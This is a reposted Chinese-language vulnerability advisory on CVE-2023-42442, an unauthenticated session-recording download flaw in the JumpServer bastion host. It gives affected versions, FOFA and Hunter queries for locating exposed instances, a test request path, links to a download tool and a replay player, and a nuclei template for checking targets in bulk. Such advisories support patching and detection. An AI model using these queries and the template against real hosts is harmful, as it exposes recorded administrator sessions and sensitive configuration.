免责声明
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
产品简介
JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。JumpServer 帮助企业以更安全的方式管控和登录所有类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。
漏洞描述
JumpServer开源堡垒机的api/api/v1/terminal/sessions/路径存在未授权访问漏洞,攻击者无需身份验证即可下载会话录像文件重播。存储在 S3、OSS 或其他云存储中的会话重播不受影响。
影响版本
3.0.0 <= JumpServer <= 3.5.4
3.6.0 <= JumpServer <= 3.6.3
网络测绘
favicon图标特征
FOFA网络测绘搜索
app="JumpServer-堡垒机"
鹰图网络测绘搜索
app.name="JumpServer"
漏洞复现
根据POC尝试请求目标 http://127.0.0.1:8080/api/v1/terminal/sessions/
细节扩展
该漏洞可以导致堡垒机操作录像缓存文件任意下载的安全问题,这一步可以使用HolyGu师傅写的检测工具去判断是否存在未授权下载。
https://github.com/HolyGu/CVE-2023-42442
工具运行后录像文件会存放在同目录下,配合jumpserver官方的播放器即可回放录像,从而导致堡垒机各敏感操作、敏感配置信息的泄露,后果较为严重。
https://github.com/jumpserver/VideoPlayer
nuclei批量验证POC模板
id: JumpServer-unauthorized
info:
name: JumpServer-unauthorized
author: 4Zen
severity: high
tags: unauth
requests:
- method: GET
path:
- "{{BaseURL}}/api/v1/terminal/sessions/"
matchers-condition: and
matchers:
- type: word
words:
- "id"
- "user"
condition: and
- type: status
status:
- 200
修复方案
更新到最新版本或及时联系供应商获取加固修复方案。https://www.jumpserver.org/
原文始发于微信公众号(划水但不摆烂):【漏洞情报 | 扩展】JumpServer未授权访问扩展利用链
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论